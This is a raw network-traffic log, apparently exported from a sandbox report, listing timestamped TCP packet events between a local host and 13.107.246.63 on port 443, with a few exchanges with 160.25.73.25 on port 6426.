                                                                                                                                                                                  Dec 4, 2024 11:10:36.850563049 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.850581884 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.850642920 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.850661039 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.850707054 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.850898981 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.850917101 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.850927114 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.850931883 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.852682114 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.852734089 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.852782965 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.853053093 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.853075027 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.853097916 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.853104115 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.855173111 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.855221033 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.855269909 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.855732918 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.855746984 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.855988026 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.856029987 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.856082916 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.856213093 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.856226921 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.396538019 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.400640011 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.400660992 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.400973082 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.400979042 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.831166029 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.831238031 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.831454039 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.831607103 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.831624985 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.831638098 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.831648111 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.834258080 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.834297895 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.834460974 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.834465981 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.834615946 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.834630966 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.834947109 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.834971905 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:37.835351944 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:37.835359097 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.095280886 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.096817970 CET497406426192.168.2.4160.25.73.25
                                                                                                                                                                                  Dec 4, 2024 11:10:38.190649986 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.191380978 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.191409111 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.192177057 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.192183971 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.219049931 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.270864964 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.274214029 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.274267912 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.274342060 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.274359941 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.274369001 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.274374008 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.278289080 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.278325081 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.278382063 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.278675079 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.278687954 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.584533930 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.596570015 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.596605062 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.597057104 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.597060919 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.625716925 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.630819082 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.630901098 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.632685900 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.632704973 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.632714987 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.632720947 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.635679007 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.635718107 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.635812044 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.636025906 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.636039019 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.637444973 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.637752056 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.637767076 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:38.638171911 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:38.638175011 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.019627094 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.023212910 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.023276091 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.041621923 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.041656017 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.041685104 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.041697025 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.045243025 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.045275927 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.045336008 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.045629978 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.045639992 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.081489086 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.085143089 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.085199118 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.123953104 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.123972893 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.123990059 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.123995066 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.257798910 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.257848978 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.258034945 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.267565012 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.267581940 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.550532103 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.551573038 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.551593065 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.552028894 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.552036047 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.986699104 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.990705013 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.990772963 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.990938902 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.990958929 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.990983963 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.990992069 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.994939089 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.994981050 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:39.995049953 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.995189905 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:39.995203972 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.059708118 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.060297012 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.060336113 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.060815096 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.060820103 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.353015900 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.356508970 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.356530905 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.356970072 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.356976032 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.505142927 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.505240917 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.505445004 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.505654097 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.505672932 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.505682945 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.505688906 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.508312941 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.508352041 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.508404016 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.509049892 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.509063959 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.761364937 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.762540102 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.762552023 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.762984991 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.762989044 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.788002968 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.791167021 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.794116020 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.794156075 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.794177055 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.794194937 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.794199944 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.796751022 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.796796083 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.798374891 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.798540115 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.798553944 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.983666897 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.988607883 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.988629103 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:40.989041090 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:40.989046097 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.196156025 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.199688911 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.199742079 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.199856043 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.199865103 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.199876070 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.199882030 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.202858925 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.202877998 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.202923059 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.203279972 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.203294039 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.417929888 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.421782970 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.421824932 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.421828032 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.421866894 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.425095081 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.425117970 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.425131083 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.425137043 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.434447050 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.434480906 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.434549093 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.434973001 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.434988022 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.775358915 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.915909052 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.915946960 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:41.916547060 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:41.916553974 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.241071939 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.244834900 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.244894981 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.277621984 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.277662039 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.277678967 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.277686119 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.289594889 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.378995895 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.396928072 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.396941900 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.397869110 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.397876024 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.418557882 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.418610096 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.418688059 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.418848991 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.418869019 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.515427113 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.516099930 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.516129971 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.516531944 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.516537905 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.734060049 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.737560034 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.737611055 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.737679005 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.737723112 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.737723112 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.737745047 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.737752914 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.740612030 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.740653992 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.740864992 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.740864992 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.740890980 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.953813076 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.956365108 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.960133076 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.960342884 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.960342884 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.960364103 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.960378885 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.963193893 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.963222980 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.963295937 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.963514090 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.963527918 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.983892918 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.984483004 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.984509945 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:42.984935999 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:42.984946966 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.162040949 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.162715912 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.162734032 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.163125992 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.163130999 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.428354979 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.431684971 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.431750059 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.431874037 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.431902885 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.431916952 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.431922913 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.436511040 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.436557055 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.436610937 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.436952114 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.436968088 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.597656012 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.600697041 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.600766897 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.600857019 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.600876093 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.600912094 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.600919008 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.603892088 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.603943110 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:43.604008913 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.604706049 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:43.604722977 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:44.200697899 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:44.201155901 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:44.201194048 CET4434984213.107.246.63192.168.2.4
